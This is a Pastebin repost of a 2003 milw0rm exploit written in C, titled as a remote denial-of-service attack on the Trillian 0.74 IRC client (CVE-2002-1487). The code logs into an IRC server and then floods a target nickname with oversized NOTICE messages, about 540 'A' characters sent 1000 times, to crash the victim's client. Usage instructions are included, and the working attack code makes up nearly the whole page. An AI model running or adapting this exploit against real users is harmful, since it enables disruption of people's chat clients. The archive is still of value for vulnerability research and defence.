API tools faq
paste
Advertisement
FlyFar

Trillian 0.74 - Remote Denial of Service - CVE-2002-1487

FlyFar
Feb 5th, 2024
1,208
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.78 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  
  3. [--------------------------------------------]
  4. [:::::::::::::::::: trillian 0.7*(d patch)   ]
  5. [:::::Denial:of:Service::simple:exploit::]
  6. [-----------------------------[l0bstah]-----]
  7. [usage ::                                           ]
  8. [      : trillah name attacked-nick          ]
  9. [                                                       ]
  10. [comment:: after patch .74d, exploits,  ]
  11. [         wich use damage (~4095 data)  ]
  12. [         not work, but this exploit           ]
  13. [         work at any patch.                    ]
  14. [                                                       ]
  15. [P.S. irc specification include rull:          ]
  16. [510 characters maximum allowed for   ]
  17. [the command and its parameters...     ]
  18. [that is why szBuf has 570 length...       ]
  19. [--------------------------------------------]
  20.  
  21. */
  22.  
  23.  #include <winsock.h>
  24.  #include <iostream.h>
  25.  #include <stdio.h>
  26.  #include <dos.h>
  27.  
  28.  #define port    4384
  29.  #define bfsize  540
  30.  #define rptimes 1000
  31.  
  32.  WSADATA     wsadata;
  33.  SOCKADDR_IN sa;
  34.  SOCKET      s;
  35.  LPHOSTENT   lpHostEntry;
  36.  int         SockAddr = sizeof(struct sockaddr);
  37.  int         i, ports;
  38.  char        szBuf[570];          // [damage data]
  39.  char        nick[50];            // <NICK> command
  40.  char        user[50];            // <USER> command
  41.  char        mode[50];            // <MODE> command
  42.  char        *cname = "trillah";  // your client name
  43.  
  44.  
  45. int main(int argc, char **argv)
  46.  {
  47.  
  48.    printf("::::::::::::::::::::::::::::::::::::\n");
  49.    printf(": trillah - remote DoS exploit :::::\n");
  50.    printf(":::::::::::::::::::::::::::[l0bstah]\n");
  51.  
  52.    if (argc < 3)
  53.    { printf("use: trillah dnsname nick\n"); return 0; }
  54.    
  55.    char *addr=argv[1];
  56.    ports=port;
  57.  
  58.    if (WSAStartup(0x0101,&wsadata) == 0)
  59.    {
  60.  
  61.         lpHostEntry = gethostbyname(addr);
  62.  
  63.         sa.sin_family = AF_INET;
  64.         sa.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
  65.         sa.sin_port = htons(ports);
  66.  
  67.         if ((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
  68.         {
  69.         printf("Can't open socket! - #%d\n",WSAGetLastError());
  70.         exit(0);
  71.         }
  72.  
  73.         printf("connecting to irc server : %s...\n", addr);
  74.  
  75.         if (connect(s, (struct sockaddr*)&sa, sizeof(sa)) == -1)
  76.         {
  77.         printf("Can't connect() - #%d\n",WSAGetLastError());
  78.         exit(0);
  79.         }      
  80.         printf("connected... starting login session \n\n");
  81.  
  82.         //*** NICK <NICK>
  83.         strcpy(nick, "NICK ");
  84.         strcat(nick, cname);
  85.         strcat(nick, "\n");
  86.         send(s,
  87.                 nick,
  88.                 strlen(nick),
  89.                 0);
  90.  
  91.         printf(nick);
  92.  
  93.         //*** USER <mode> <unused> <realname>
  94.         strcpy(user, "USER ");
  95.         strcat(user, cname);
  96.         strcat(user, " 0 127.0.0.1 : trilla\n");
  97.         send(s,
  98.                 user,
  99.                 strlen(user),
  100.                 0);
  101.  
  102.         printf(user);
  103.  
  104.         sleep(1);
  105.  
  106.         //*** MODE <nick> (+|-*)
  107.         strcpy(mode, "MODE ");
  108.         strcat(mode, cname);
  109.         strcat(mode, " +i\n");
  110.         send(s,
  111.                 mode,
  112.                 strlen(mode),
  113.                 0);
  114.  
  115.         sleep(2);
  116.  
  117.         //**********DAMAGE****DATA*************//
  118.  
  119.         printf("Sending damage data...\n");
  120.         strcat(szBuf, "NOTICE ");
  121.         strcat(szBuf, argv[2]);
  122.         strcat(szBuf, " :");
  123.         for(i=0;i<=bfsize;i++) strcat(szBuf,"A");
  124.         strcat(szBuf, "\n");
  125.  
  126.  
  127.         for (i=0;i<=rptimes;i++)
  128.         {
  129.  
  130.         send(s,
  131.             szBuf,
  132.             strlen(szBuf),
  133.             0);
  134.         }
  135.  
  136.  
  137.         printf("attack complete....");
  138.  
  139.         //*************************************//
  140.  
  141.         closesocket(s);
  142.        
  143.         }
  144.  
  145.   WSACleanup();
  146.  
  147. }
  148.  
  149. // milw0rm.com [2003-08-01]
  150.            
Tags: Exploit CVE Vulnerability trillian
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!